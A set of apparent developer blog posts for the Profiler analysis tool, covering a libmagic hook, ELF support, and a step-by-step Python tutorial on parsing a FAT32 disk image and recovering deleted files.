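
For a quick test, the API can also be used directly (the file name is just an example):

from Pro.magic import *

m = magic_open(MAGIC_CONTINUE)
magic_load(m, magic_builtin_db_name())
print(magic_file(m, "C:\\Windows\\regedit.exe"))
magic_close(m)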

Let’s create a small hook to demonstrate the use of the library, although it’s quite intuitive. Here’s the cfg entry:

[MagicInfo]
label = Magic: information provided by libmagic
file = magicinfo.py
init = init
end = end
scanning = scanning

The Python code:

from Pro.magic import *

def init():
    m = magic_open(MAGIC_CONTINUE)
    magic_load(m, magic_builtin_db_name())
    return m

def end(m):
    magic_close(m)

def scanning(sp, m):
    s = sp.getObjectStream()
    buf = s.read(0, min(0x1000, s.size()))
    info = magic_buffer(m, buf)
    if info != None:
        sp.addMetaDataString("Magic", info)

The addMetaDataString method in ScanProvider adds a string to the individual file report, which is visible from the file stats page in the workspace.

So if we open a file in the workspace, we’ll get the following extra information:

libmagic

The script above will be included in the update.

ELF Support

The upcoming 1.1 version of Profiler introduces preliminary ELF support. I say preliminary, as this support wasn't originally scheduled for this version. Anyway, here are some screenshots…

Segments (called program headers in the official terminology):

Segments

Sections (object files for instance don’t contain segments):

Sections

Symbols:

Symbols

ELF was the last important executable file format missing from the list of supported formats. All other formats are already supported, be they native (PE, Mach-O) or managed (.NET, Java, DEX, ActionScript2, ActionScript3).

Raw File System Analysis (FAT32 File Recovery)

This post isn’t about upcoming features, it’s about things you can already do with Profiler. What we’ll see is how to import structures used for file system analysis from C/C++ sources, use them to analyze raw hex data, create a script to do the layout work for us in the future and at the end we’ll see how to create a little utility to recover deleted files. The file system used for this demonstration is FAT32, which is simple enough to avoid making the post too long.

Note: Before starting you might want to update. The 1.0.1 version is out and contains a few small fixes. Among them: the ‘signed char’ type wasn't recognized by the CFFStruct internal engine, and the FAT32 structures I imported do use it. While ‘signed char’ may seem redundant, it does make sense, since C compilers can be instructed to treat char types as unsigned.

Import file system structures

Importing file system structures from C/C++ sources is easy thanks to the Header Manager tool. In fact, it took me less than 30 minutes to import the structures for the most common file systems from different code bases. Click here to download the archive with all the headers.

Here’s the list of headers I have created:

  • ext – ext2/3/4 imported from FreeBSD
  • ext2 – imported from Linux
  • ext3 – imported from Linux
  • ext4 – imported from Linux
  • fat – imported from FreeBSD
  • hfs – imported from Darwin
  • iso9660 – imported from FreeBSD
  • ntfs – imported from Linux
  • reiserfs – imported from Linux
  • squashfs – imported from Linux
  • udf – imported from FreeBSD

Copy the files to your user headers directory (e.g. “AppData\Roaming\CProfiler\headers”). It’s better to not put them in a sub-directory. Please note that apart from the FAT structures, none of the others have been tried out.

Note: Headers created from Linux sources contain many additional structures, this is due to the includes in the parsed source code. This is a bit ugly: in the future it would be a good idea to add an option to import only structures belonging to files in a certain path hierarchy and those referenced by them.

Since this post is about FAT, we’ll see how to import the structures for this particular file system. But the same steps apply for other file systems as well and not only for them. If you’ve never imported structures before, you might want to take a look at this previous post about dissecting an ELF and read the documentation about C++ types.

We open the Header Manager and configure some basic options like ‘OS’, ‘Language’ and ‘Standard’. In this particular case I imported the structures from FreeBSD, so I just set ‘freebsd’, ‘c’ and ‘c11’. Then we need to add the header paths, which in my case were the following:

C:/Temp/freebsd-master
C:/Temp/freebsd-master/include
C:/Temp/freebsd-master/sys
C:/Temp/freebsd-master/sys/x86
C:/Temp/freebsd-master/sys/i386/include
C:/Temp/freebsd-master/sys/i386

Then in the import edit we insert the following code:

HEADER_START("fat");

#include 
#include 
#include 
#include 
#include 

Now we can click on ‘Import’.

Import FAT structures

That’s it! We now have all the FAT structures we need in the ‘fat’ header file.

It should also be mentioned that I modified some fields of the direntry structure from the Header Manager, because they were declared as byte arrays, but should actually be shown as short and int values.

Parse the Master Boot Record

Before going on with the FAT analysis, we need to briefly talk about the MBR. FAT partitions are usually found in a larger container, like a partitioned device.

To perform my tests I created a virtual hard-disk in Windows 7 and formatted it with FAT32.

VHD MBR

As you might be able to spot, the VHD file begins with an MBR. In order to locate the partitions it is necessary to parse the MBR first. The format of the MBR is very simple and you can look it up on Wikipedia. In this case we're only interested in the start and size of each partition.

Profiler doesn’t yet support the MBR format, although it might be added in the future. In any case, it’s easy to add the missing feature: I wrote a small hook which parses the MBR and adds the partitions as embedded objects.

Here’s the cfg data:

[GenericMBR]
label = Generic MBR Partitions
file = generic_mbr.py
scanning = scanning

And here’s the Python script:

def scanning(sp, ud):
    # make sure we're at the first level and that the format is unknown
    if sp.scanNesting() != 0 or sp.getObjectFormat() != "":
        return
    # check boot signature
    obj = sp.getObject()
    bsign = obj.Read(0x1FE, 2)
    if len(bsign) != 2 or bsign[0] != 0x55 or bsign[1] != 0xAA:
        return
    # add partitions
    for x in range(4):
        entryoffs = 0x1BE + (x * 0x10)
        offs, ret = obj.ReadUInt32(entryoffs + 8)
        size, ret = obj.ReadUInt32(entryoffs + 12)
        if offs != 0 and size != 0:
            sp.addEmbeddedObject(offs * 512, size * 512, "?", "Partition #" + str(x + 1))

And now we can inspect the partitions directly (do not forget to enable the hook from the extensions).

VHD Partitions

Easy.

Analyze raw file system data

The basics of the FAT format are quite simple to describe. The data begins with the boot sector header, plus some additional fields for FAT32 over FAT16 and for FAT16 over FAT12. We're only interested in FAT32, so I will describe only this particular variant. The boot sector header specifies essential information such as sector size, sectors per cluster, number of FATs, size of the FAT etc. It also specifies the number of reserved sectors. These reserved sectors start with the boot sector, and where they end the FAT begins.

The ‘FAT’ in this case is not just the name of the file system, but the File Allocation Table itself. The size of the FAT, as already mentioned, is specified in the boot sector header. Usually, for data-loss prevention, more than one FAT is present. Normally there are two FATs: the number is specified in the boot sector header. The backup FAT follows the first one and has the same size. The data after the FAT(s) and right until the end of the partition includes directory entries and file data. The cluster right after the FAT(s) usually starts with the Root Directory entry, but even this is specified in the boot sector header.

The FAT itself is just an array of 32-bit indexes pointing to clusters. The first 2 indexes are special: they specify the range of EOF values for indexes. It works like this: a directory entry for a file (directories and files share the same structure) specifies the first cluster of said file; if the file is bigger than one cluster, the FAT is looked up at the index representing the current cluster, and this index specifies the next cluster belonging to the file. If the index contains one of the values in the EOF range, the file has no more clusters or perhaps contains a damaged cluster (0xFFFFFFF7). Indexes with a value of zero are marked as free. Cluster indexes are 2-based: cluster 2 is actually cluster 0 in the data region. This means that if the Root Directory is specified to be located at cluster 2, it is located right after the FATs.

Hence, the size of the FAT depends on the size of the partition, and it must be big enough to accommodate an array large enough to represent every cluster in the data area.
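
To make the layout concrete, here's a small plain-Python sketch which computes the relevant offsets from the boot sector values described above and follows the cluster chain of a file through the FAT (the geometry values are made up for illustration):

import struct

# sample geometry as it would be read from the boot sector header
bytes_per_sec = 512
sec_per_clust = 8
res_sectors = 32      # reserved sectors, boot sector included
nfats = 2
fat_sects = 0x3AB     # sectors occupied by one FAT

bytes_per_clust = bytes_per_sec * sec_per_clust
fat_offs = res_sectors * bytes_per_sec     # the first FAT follows the reserved sectors
fat_size = fat_sects * bytes_per_sec
data_offs = fat_offs + nfats * fat_size    # the data region follows the FATs

def cluster_to_offset(cluster):
    # cluster indexes are 2-based: cluster 2 maps to the start of the data region
    return data_offs + (cluster - 2) * bytes_per_clust

def cluster_chain(fat_bytes, first_cluster):
    # follow the chain until a free, damaged or EOF index is encountered
    chain = []
    cluster = first_cluster
    while 2 <= cluster < 0x0FFFFFF7:
        chain.append(cluster)
        cluster = struct.unpack_from("<I", fat_bytes, cluster * 4)[0] & 0x0FFFFFFF
    return chain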

So, let’s perform our raw analysis by adding the boot sector header and the additional FAT32 fields:

Add struct

Note: When adding a structure, make sure that it's packed to 1, otherwise the field alignment will be wrong.

Boot sector

Then we highlight the FATs.

FATs

And the Root Directory entry.

Root Directory

This last step was just for demonstration, as we’re currently not interested in the Root Directory. Anyway, now we have a basic layout of the FAT to inspect and this is useful.

Let’s now make our analysis applicable to future cases.

Automatically create an analysis layout

Manually analyzing a file is very useful and it's the first step every one of us has to take when studying an unfamiliar file format. However, chances are that we'll have to analyze files with the same format in the future.

That’s why we could write a small Python script to create the analysis layout for us. We’ve already seen how to do this in the post about dissecting an ELF.

Here’s the code:

from Pro.Core import *
from Pro.UI import *
 
def buildFATLayout(obj, l):
    hname = "fat"
    hdr = CFFHeader()
    if hdr.LoadFromFile(hname) == False:
        return
    sopts = CFFSO_VC | CFFSO_Pack1
    d = LayoutData()
    d.setTypeOptions(sopts)
 
    # add boot sector header and FAT32 fields
    bhdr = obj.MakeStruct(hdr, "bootsector", 0, sopts)
    d.setColor(ntRgba(0, 170, 255, 70))
    d.setStruct(hname, "bootsector")
    l.add(0, bhdr.Size(), d)
    bexhdr = obj.MakeStruct(hdr, "bpb710", 0xB, sopts)
    d.setStruct(hname, "bpb710")
    l.add(0xB, bexhdr.Size(), d)

    # get FAT32 info
    bytes_per_sec = bexhdr.Num("bpbBytesPerSec")
    sec_per_clust = bexhdr.Num("bpbSecPerClust")
    res_sect = bexhdr.Num("bpbResSectors")
    nfats = bexhdr.Num("bpbFATs")
    fat_sects = bexhdr.Num("bpbBigFATsecs")
    root_clust = bexhdr.Num("bpbRootClust")
    bytes_per_clust = bytes_per_sec * sec_per_clust

    # add FAT intervals, highlight copies with a different color
    d2 = LayoutData()
    d2.setColor(ntRgba(255, 255, 127, 70))
    fat_start = res_sect * bytes_per_sec
    fat_size = fat_sects * bytes_per_sec
    d2.setDescription("FAT1")
    l.add(fat_start, fat_size, d2)
    # add copies
    d2.setColor(ntRgba(255, 170, 127, 70))
    for x in range(nfats - 1):
        fat_start = fat_start + fat_size
        d2.setDescription("FAT" + str(x + 2))
        l.add(fat_start, fat_size, d2)
    fat_end = fat_start + fat_size

    # add root directory (cluster indexes are 2-based)
    rootdir_offs = (root_clust - 2) * bytes_per_clust + fat_end
    rootdir = obj.MakeStruct(hdr, "direntry", rootdir_offs, sopts)
    d.setStruct(hname, "direntry")
    d.setDescription("Root Directory")
    l.add(rootdir_offs, rootdir.Size(), d)
    
 
hv = proContext().getCurrentView()
if hv.isValid() and hv.type() == ProView.Type_Hex:
    c = hv.getData()
    obj = CFFObject()
    obj.Load(c)
    lname = "FAT_ANALYSIS" # we could make the name unique
    l = proContext().getLayout(lname) 
    buildFATLayout(obj, l)
    # apply the layout to the current hex view
    hv.setLayoutName(lname)

We can create an action with this code or just run it on the fly with Ctrl+Alt+R.

Recover deleted files

Now that we know where the FAT is located and where the data region begins, we can try to recover deleted files. There’s more than one possible approach to this task (more on that later). What I chose to do is to scan the entire data region for file directory entries and to perform integrity checks on them, in order to establish that they really are what they seem to be.

Let’s take a look at the original direntry structure:

struct direntry {
	u_int8_t	deName[11];	/* filename, blank filled */
#define	SLOT_EMPTY	0x00		/* slot has never been used */
#define	SLOT_E5		0x05		/* the real value is 0xe5 */
#define	SLOT_DELETED	0xe5		/* file in this slot deleted */
	u_int8_t	deAttributes;	/* file attributes */
#define	ATTR_NORMAL	0x00		/* normal file */
#define	ATTR_READONLY	0x01		/* file is readonly */
#define	ATTR_HIDDEN	0x02		/* file is hidden */
#define	ATTR_SYSTEM	0x04		/* file is a system file */
#define	ATTR_VOLUME	0x08		/* entry is a volume label */
#define	ATTR_DIRECTORY	0x10		/* entry is a directory name */
#define	ATTR_ARCHIVE	0x20		/* file is new or modified */
	u_int8_t	deLowerCase;	/* NT VFAT lower case flags */
#define	LCASE_BASE	0x08		/* filename base in lower case */
#define	LCASE_EXT	0x10		/* filename extension in lower case */
	u_int8_t	deCHundredth;	/* hundredth of seconds in CTime */
	u_int8_t	deCTime[2];	/* create time */
	u_int8_t	deCDate[2];	/* create date */
	u_int8_t	deADate[2];	/* access date */
	u_int8_t	deHighClust[2];	/* high bytes of cluster number */
	u_int8_t	deMTime[2];	/* last update time */
	u_int8_t	deMDate[2];	/* last update date */
	u_int8_t	deStartCluster[2]; /* starting cluster of file */
	u_int8_t	deFileSize[4];	/* size of file in bytes */
};

Every directory entry has to be aligned to 0x20. If the file has been deleted, the first byte of the deName field will be set to SLOT_DELETED (0xE5). That's the first thing to check. The directory name should also not contain certain values, like 0x00. According to Wikipedia, the following values aren't allowed:

  • ” * / : < > ? \ |
    Windows/MS-DOS has no shell escape character
  • + , . ; = [ ]
    They are allowed in long file names only.
  • Lower case letters a–z
    Stored as A–Z. Allowed in long file names.
  • Control characters 0–31
  • Value 127 (DEL)

We can use these rules to validate the short file name. Moreover, certain directory entries are used only to store long file names:

/*
 * Structure of a Win95 long name directory entry
 */
struct winentry {
	u_int8_t	weCnt;
#define	WIN_LAST	0x40
#define	WIN_CNT		0x3f
	u_int8_t	wePart1[10];
	u_int8_t	weAttributes;
#define	ATTR_WIN95	0x0f
	u_int8_t	weReserved1;
	u_int8_t	weChksum;
	u_int8_t	wePart2[12];
	u_int16_t	weReserved2;
	u_int8_t	wePart3[4];
};

We can exclude these entries by making sure that the deAttributes/weAttributes isn’t ATTR_WIN95 (0xF).

Once we have confirmed the integrity of the file name and made sure it’s not a long file name entry, we can validate the deAttributes. It should definitely not contain the flags ATTR_DIRECTORY (0x10) and ATTR_VOLUME (8).

Finally we can make sure that deFileSize isn’t 0 and that deHighClust combined with deStartCluster contains a valid cluster index.

It’s easier to write the code than to talk about it. Here’s a small snippet which looks for deleted files and prints them to the output view:

from Pro.Core import *

class FATData(object):
    pass

def setupFATData(obj):
    hdr = CFFHeader()
    if hdr.LoadFromFile("fat") == False:
        return None
    bexhdr = obj.MakeStruct(hdr, "bpb710", 0xB, CFFSO_VC | CFFSO_Pack1)
    fi = FATData()
    fi.obj = obj
    fi.hdr = hdr
    # get FAT32 info
    fi.bytes_per_sec = bexhdr.Num("bpbBytesPerSec")
    fi.sec_per_clust = bexhdr.Num("bpbSecPerClust")
    fi.res_sect = bexhdr.Num("bpbResSectors")
    fi.nfats = bexhdr.Num("bpbFATs")
    fi.fat_sects = bexhdr.Num("bpbBigFATsecs")
    fi.root_clust = bexhdr.Num("bpbRootClust")
    fi.bytes_per_clust = fi.bytes_per_sec * fi.sec_per_clust
    fi.fat_offs = fi.res_sect * fi.bytes_per_sec
    fi.fat_size = fi.fat_sects * fi.bytes_per_sec
    fi.data_offs = fi.fat_offs + (fi.fat_size * fi.nfats)
    fi.data_size = obj.GetSize() - fi.data_offs
    fi.data_clusters = fi.data_size // fi.bytes_per_clust
    return fi

invalid_short_name_chars = [
    127,
    ord('"'), ord("*"), ord("/"), ord(":"), ord("<"), ord(">"), ord("?"), ord("\\"), ord("|"),
    ord("+"), ord(","), ord("."), ord(";"), ord("="), ord("["), ord("]")
    ]
def validateShortName(name):
    n = len(name)
    for x in range(n):
        c = name[x]
        if (c >= 0 and c <= 31) or (c >= 0x61 and c <= 0x7A) or c in invalid_short_name_chars:
            return False
    return True

# validate short name
# validate attributes: avoid long file name entries, directories and volumes
# validate file size
# validate cluster index
def validateFileDirectoryEntry(fi, de):
    return validateShortName(de.name) and de.attr != 0xF and (de.attr & 0x18) == 0 and \
            de.file_size != 0 and de.clust_idx >= 2 and de.clust_idx - 2 < fi.data_clusters

class DirEntryData(object):
    pass

def getDirEntryData(b):
    # reads after the first byte
    de = DirEntryData()
    de.name = b.read(10)
    de.attr = b.u8()     
    b.read(8) # skip some fields
    de.high_clust = b.u16()
    b.u32() # skip two fields
    de.clust_idx = (de.high_clust << 16) | b.u16()
    de.file_size = b.u32()
    return de

def findDeletedFiles(fi):
    # scan the data region one cluster at a time using a buffer
    # this is more efficient than using an array of CFFStructs
    dir_entries = fi.data_size // 0x20
    b = fi.obj.ToBuffer(fi.data_offs)
    b.setBufferSize(0xF000)
    for x in range(dir_entries):
        try:
            unaligned = b.getOffset() % 0x20
            if unaligned != 0:
                b.read(0x20 - unaligned)
            # has it been deleted?
            if b.u8() != 0xE5:
                continue
            # validate fields
            de = getDirEntryData(b)
            if validateFileDirectoryEntry(fi, de) == False:
                continue
            # we have found a deleted file entry!
            name = de.name.decode("ascii", "replace")
            print(name + " - offset: " + hex(b.getOffset() - 0x20))
        except:
            # an exception occurred, debug info
            print("exception at offset: " + hex(b.getOffset() - 0x20))
            raise

obj = proCoreContext().currentScanProvider().getObject()
fi = setupFATData(obj)
if fi != None:
    findDeletedFiles(fi)

This script is to be run on the fly with Ctrl+Alt+R. It's not complete, otherwise I would have added a wait box: as it is now, the script just blocks the UI for the entire execution. We'll see later how to put everything together in a meaningful way.

The output of the script is the following:

���������� - offset: 0xd6a0160
���������� - offset: 0x181c07a0
���������� - offset: 0x1d7ee980
&�&�&�&�&� - offset: 0x1e7dee20
'�'�'�'�'� - offset: 0x1f3b49a0
'�'�'�'�'� - offset: 0x1f5979a0
'�'�'�'�'� - offset: 0x1f9f89a0
'�'�'�'�'� - offset: 0x1fbdb9a0
$�$�$�$�$� - offset: 0x1fdcad40
&�&�&�&�&� - offset: 0x1fdcc520
'�'�'�'�'� - offset: 0x2020b9a0
'�'�'�'�'� - offset: 0x205a99a0
'�'�'�'�'� - offset: 0x20b0fe80
'�'�'�'�'� - offset: 0x20b0fec0
'�'�'�'�'� - offset: 0x20e08e80
'�'�'�'�'� - offset: 0x20e08ec0
'�'�'�'�'� - offset: 0x21101e80
'�'�'�'�'� - offset: 0x21101ec0
'�'�'�'�'� - offset: 0x213fae80
'�'�'�'�'� - offset: 0x213faec0
 � � � � � - offset: 0x21d81fc0
#�#�#�#�#� - offset: 0x221b96a0
'�'�'�'�'� - offset: 0x226279a0
 � � � � � - offset: 0x2298efc0
'�'�'�'�'� - offset: 0x22e1ee80
'�'�'�'�'� - offset: 0x22e1eec0
'�'�'�'�'� - offset: 0x232c69a0
'�'�'�'�'� - offset: 0x234a99a0
'�'�'�'�'� - offset: 0x2368c9a0
'�'�'�'�'� - offset: 0x23a37e80
'�'�'�'�'� - offset: 0x23a37ec0
'�'�'�'�'� - offset: 0x23d30e80
'�'�'�'�'� - offset: 0x23d30ec0
'�'�'�'�'� - offset: 0x24029e80
'�'�'�'�'� - offset: 0x24029ec0
'�'�'�'�'� - offset: 0x24322e80
'�'�'�'�'� - offset: 0x24322ec0
'�'�'�'�'� - offset: 0x2461be80
'�'�'�'�'� - offset: 0x2461bec0
'�'�'�'�'� - offset: 0x2474d9a0
 � � � � � - offset: 0x24ab4fc0
 � � � � � - offset: 0x24f01fc0
 � � � � � - offset: 0x2534efc0
���������O - offset: 0x33b4f2e0
�������@@@ - offset: 0x345c7200
OTEPAD EXE - offset: 0x130c009e0
TOSKRNLEXE - offset: 0x130c00b80
TPRINT EXE - offset: 0x130c00bc0
��S�W����� - offset: 0x1398fddc0
��S�V���YY - offset: 0x13af3ad60
��M����E�� - offset: 0x13bbec640
EGEDIT EXE - offset: 0x13ef1f1a0

We can see many false positives in the list. The results would be cleaner if we allowed only ASCII characters in the name, but this wouldn't be correct, because short names do allow values above 127. We could make this an extra option; generally speaking, it's probably better to have some false positives than to miss valid entries. Among the false positives we can spot four real entries. What I did on the test disk was to copy many files from the System32 directory of Windows and then delete four of them: exactly the four found by the script.

The next step is recovering the content of the deleted files. The theory here is that we retrieve the first cluster of the file from the directory entry and then use the FAT to retrieve more entries until the file size is satisfied. Since the file has been deleted, its indexes in the FAT won't contain the next-cluster values: they will have been set to 0. So we look for adjacent 0 indexes to find free clusters which may have belonged to the file. Another approach would be to dump the entire file size starting from the first cluster, but that approach is worse, because it doesn't tolerate even a little bit of fragmentation in the FAT. Of course, heavy fragmentation drastically reduces the chances of a successful recovery.

However, there's a gotcha which I wasn't aware of and which wasn't mentioned in my references. Let's take a look at the deleted directory entry of 'notepad.exe'.

Notepad directory entry

In FAT32 the index of the first cluster is obtained by combining the high-word deHighClust with the low-word deStartCluster in order to obtain a 32-bit index.

The problem is that the high-word has been zeroed. The actual value should be 0x0013. It seems this behavior is common on Microsoft operating systems, as mentioned in this thread on Forensic Focus.

This means that only files with a cluster index equal to or lower than 0xFFFF will be correctly pointed at. This makes another approach for FAT32 file recovery more appealing: instead of looking for deleted directory entries, one could directly look for cluster indexes with a value of 0 in the FAT and recognize the start of a file by matching signatures. Profiler offers an API to identify file signatures (although limited to the file formats it supports), so we could easily implement this logic. Another advantage of this approach is that it doesn't require a deleted file directory entry to work, increasing the chances of recovering deleted files. However, even that approach has certain disadvantages:

  1. Files which have no signature (like text files) or are not identified won't be recovered.
  2. The name of the files won't be recovered at all, unless they contain it themselves, but that's unlikely.

Disadvantages notwithstanding, I think that if one had to choose between the two approaches, the second one holds higher chances of success. So why did I opt to do otherwise? Because I thought it would be nice to recover file names, even if only partially, and to delve a bit more into the format of FAT32. The blunt approach can be generalized more and requires less FAT knowledge.

However, surely the best approach is to combine both systems in order to maximize the chances of recovery, at the cost of duplicates. But this is just a demonstration, so let's keep it relatively simple and go back to the problem at hand: the incomplete start cluster index.

Recovering files only from lower parts of the disk isn't really good enough. We could try to recover the high-word of the index from adjacent directory entries of existing files. For instance, let's take a look at the deleted directory entry:

Deleted entry

As you can see, the directory entry above the deleted one represents a valid file entry and contains an intact high-word we could use to repair our index. Please remember that this technique is just something I came up with and offers no guarantee whatsoever. In fact, it only works under certain conditions:

  1. The cluster containing the deleted entry must also contain a valid file directory entry.
  2. The FAT can't be heavily fragmented, otherwise the retrieved high-word might not be correct.

Still, I think it's interesting, and while it might not always be successful in automatic mode, it can be helpful when trying a manual recovery.

This is how the code to recover partial cluster indexes might look:

def recoverClusterHighWord(fi, offs):
    cluster_start = offs - (offs % fi.bytes_per_clust)
    deloffs = offs - (offs % 0x20)
    # number of directory entries before and after the deleted one,
    # remaining inside the same cluster
    nbefore = (deloffs - cluster_start) // 0x20
    nafter = (fi.bytes_per_clust - (deloffs - cluster_start)) // 0x20 - 1
    b = fi.obj.ToBuffer(deloffs + 0x20, Bufferize_BackAndForth)
    b.setBufferSize(fi.bytes_per_clust * 2)
    de_before = None
    de_after = None
    try:
        # try to find a valid entry before the deleted one
        for x in range(nbefore):
            b.setOffset(deloffs - (x + 1) * 0x20)
            # skip entries which are themselves deleted
            if b.u8() == 0xE5:
                continue
            de = getDirEntryData(b)
            if validateFileDirectoryEntry(fi, de):
                de_before = de
                break
        # try to find a valid entry after the deleted one
        if de_before is None:
            for x in range(nafter):
                b.setOffset(deloffs + (x + 1) * 0x20)
                # skip entries which are themselves deleted
                if b.u8() == 0xE5:
                    continue
                de = getDirEntryData(b)
                if validateFileDirectoryEntry(fi, de):
                    de_after = de
                    break
    except:
        # any read error simply ends the search
        pass
    # return the high-word if any
    if de_before is not None:
        return de_before.high_clust
    if de_after is not None:
        return de_after.high_clust
    return 0

It tries to find a valid file directory entry before the deleted one and, failing that, after it, remaining in the same cluster. Now we can write a small function to recover the file content.

# dump the content of a deleted file using the FAT
def dumpDeletedFileContent(fi, f, start_cluster, file_size):
    while file_size > 0:
        offs = clusterToOffset(fi, start_cluster)
        data = fi.obj.Read(offs, fi.bytes_per_clust)
        if file_size < fi.bytes_per_clust:
            data = data[:file_size]
        f.write(data)
        file_size = file_size - min(file_size, fi.bytes_per_clust)
        if file_size == 0:
            break
        # find the next cluster: the FAT entries of a deleted file are
        # zeroed, so we look for the next cluster marked as free
        while True:
            start_cluster = start_cluster + 1
            idx_offs = start_cluster * 4 + fi.fat_offs
            idx, ok = fi.obj.ReadUInt32(idx_offs)
            if not ok:
                return False
            if idx == 0:
                break
    return True
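
Just to show how the two pieces fit together, here's a rough usage sketch. recoverOneFile is a hypothetical helper written for this post; it assumes a directory-entry object like the ones returned by the findDeletedFiles function used further below, with offs, clust_idx and file_size fields, and that clust_idx holds only the low word of the index.

# hypothetical glue code: repair the start cluster of a deleted entry
# and dump its content to a local file
def recoverOneFile(fi, de, out_path):
    start_cluster = de.clust_idx
    if (start_cluster >> 16) == 0:
        # the high-word was zeroed on deletion: borrow it from a
        # neighbouring valid entry in the same cluster
        high = recoverClusterHighWord(fi, de.offs)
        start_cluster = (high << 16) | start_cluster
    with open(out_path, "wb") as f:
        return dumpDeletedFileContent(fi, f, start_cluster, de.file_size)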

All the pieces are there, it's time to bring them together.

Create a recovery tool

With the recently introduced logic provider extensions, it's possible to create all kinds of easy-to-use custom utilities. Until now we have seen useful pieces of code, but using them as provided is neither user-friendly nor practical. Wrapping them up in a nice graphical utility is much better.

Home view

What follows is the source code, or at least part of it: I have omitted the parts which haven't changed significantly. You can download the full source code from here.

Here's the cfg entry:

[FAT32Recovery]
label = FAT32 file recovery utility
descr = Recover files from a FAT32 partition or drive.
file = fat32_recovery.py
init = FAT32Recovery_init

And the Python code:

class RecoverySystem(LocalSystem):

    def __init__(self):
        LocalSystem.__init__(self)
        self.ctx = proCoreContext()
        self.partition = None
        self.current_partition = 0
        self.fi = None
        self.counter = 0

    def wasAborted(self):
        Pro.UI.proProcessEvents(1)
        return self.ctx.wasAborted()

    def nextFile(self):
        fts = FileToScan()

        if self.partition is None:
            # get the next partition from the MBR partition table
            while self.current_partition < 4:
                entryoffs = 0x1BE + (self.current_partition * 0x10)
                self.current_partition = self.current_partition + 1
                # starting sector and sector count of the partition entry
                offs, ret = self.disk.ReadUInt32(entryoffs + 8)
                size, ret = self.disk.ReadUInt32(entryoffs + 12)
                if offs != 0 and size != 0:
                    cpartition = self.disk.GetStream()
                    cpartition.setRange(offs * 512, size * 512)
                    part = CFFObject()
                    part.Load(cpartition)
                    self.fi = setupFATData(part)
                    if self.fi is not None:
                        self.fi.system = self
                        self.partition = part
                        self.next_entry = self.fi.data_offs
                        self.fi.ascii_names_conv = self.ascii_names_conv
                        self.fi.repair_start_clusters = self.repair_start_clusters
                        self.fi.max_file_size = self.max_file_size
                        break

        if self.partition is not None:
            de = findDeletedFiles(self.fi, self.next_entry)
            if de is not None:
                self.next_entry = de.offs + 0x20
                fname = "%08X" % self.counter
                # open never returns None: failures raise an exception
                try:
                    f = open(self.dump_path + fname, "wb")
                except OSError:
                    Pro.UI.proContext().msgBox(MsgErr, "Couldn't open file '" + fname + "'")
                    return fts
                dumpDeletedFileContent(self.fi, f, de.clust_idx, de.file_size)
                f.close()
                self.counter = self.counter + 1
                fts.setName(fname + "\\" + de.name)
                fts.setLocalName(self.dump_path + fname)
            else:
                self.partition = None

        return fts

def recoveryOptionsCallback(pe, id, ud):
    if id == Pro.UI.ProPropertyEditor.Notification_Close:
        # the dump directory must exist, otherwise flag the first field
        path = pe.getValue(0)
        if len(path) == 0 or not os.path.isdir(path):
            errs = NTIntList()
            errs.append(0)
            pe.setErrors(errs)
            return False
    return True

def FAT32Recovery_init():
    ctx = Pro.UI.proContext()
    file_name = ctx.getOpenFileName("Select disk...")
    if len(file_name) == 0:
        return False

    cdisk = createContainerFromFile(file_name)
    if cdisk.isNull():
        ctx.msgBox(MsgWarn, "Couldn't open disk!")
        return False

    disk = CFFObject()
    disk.Load(cdisk)
    # check the MBR boot signature (0x55AA) at offset 0x1FE
    bsign = disk.Read(0x1FE, 2)
    if len(bsign) != 2 or bsign[0] != 0x55 or bsign[1] != 0xAA:
        ctx.msgBox(MsgWarn, "Invalid MBR!")
        return False

    dlgxml = """

  
""" opts = ctx.askParams(dlgxml, "FAT32RecoveryOptions", recoveryOptionsCallback, None) if opts.isEmpty(): return False s = RecoverySystem() s.disk = disk s.dump_path = os.path.normpath(opts.value(0)) + os.sep s.ascii_names_conv = "strict" if opts.value(1) else "replace" s.repair_start_clusters = opts.value(2) if opts.value(3) != 0: s.max_file_size = opts.value(3) * 1024 * 1024 proCoreContext().setSystem(s) return True

When the tool is activated it will ask for the disk file to be selected, then it will show an options dialog.

Options

In our case we can select the option 'Ascii only names' to exclude false positives.

The options dialog also asks for a directory in which to save the recovered files. In the future it will be possible to save volatile files in the temporary directory created for the report, but since that's not yet possible, it's the responsibility of the user to delete the recovered files when they are no longer needed.

The end results of the recovery operation:

Results

All four deleted files have been successfully recovered.

Three executables are marked as risky because intrinsic risk is enabled and only 'ntoskrnl.exe' contains a valid digital certificate.

Conclusions

I'd like to remind you that this utility hasn't been tested on disks other than the one I created for this post and, as already mentioned, it doesn't even implement the best method to recover files from a FAT32 partition, which is the signature-based approach. It's possible that in the future we'll improve the script and include it in an update.

The purpose of this post was to show some of the many things which can be done with Profiler. I used only Profiler for the entire job, from analysis to code development (I even wrote the entire Python code with it). Finally, it demonstrates how a utility with commercial value like the one presented can be written in under 300 lines of Python code (counting comments and blank lines).

The advantages of using the Profiler SDK are many. Among them:

  • It hugely simplifies the analysis of files. In fact, I used only two external Python functions: one to check the existence of a directory and one to normalize the path string.
  • It helps to build a fast and robust product.
  • It offers the user a graphical analysis experience with little or no effort.
  • It gives the user the benefit of all the other features and extensions offered by Profiler.

To better explain what is meant by the last point, let's take the current example: thanks to the huge number of formats supported by Profiler, it is easy for the user to validate the recovered files.

Validate recovered files

In the case of Portable Executables it's extremely easy because of the presence of digital certificates, checksums and data structures. But even with other file types it's easy, because Profiler may detect errors in the format or unused ranges.
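
For instance, a first sanity check on a recovered executable can be as simple as trying to load it. quickValidatePE is just a hypothetical helper written for this example, using only SDK calls shown earlier in this post:

from Pro.Core import *
from Pro.PE import *

# rough sanity check: a recovered file which can't even be loaded as a
# PE was most likely carved incorrectly
def quickValidatePE(fname):
    c = createContainerFromFile(fname)
    if c.isNull():
        return False
    pe = PEObject()
    return pe.Load(c)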

I hope you enjoyed this post!

P.S. You can download the complete source code and related files from here.

References

  1. File System Forensic Analysis - Brian Carrier
  2. Understanding FAT32 Filesystems - Paul Stoffregen
  3. Official documentation - Microsoft
  4. File Allocation Table - Wikipedia
  5. Master boot record - Wikipedia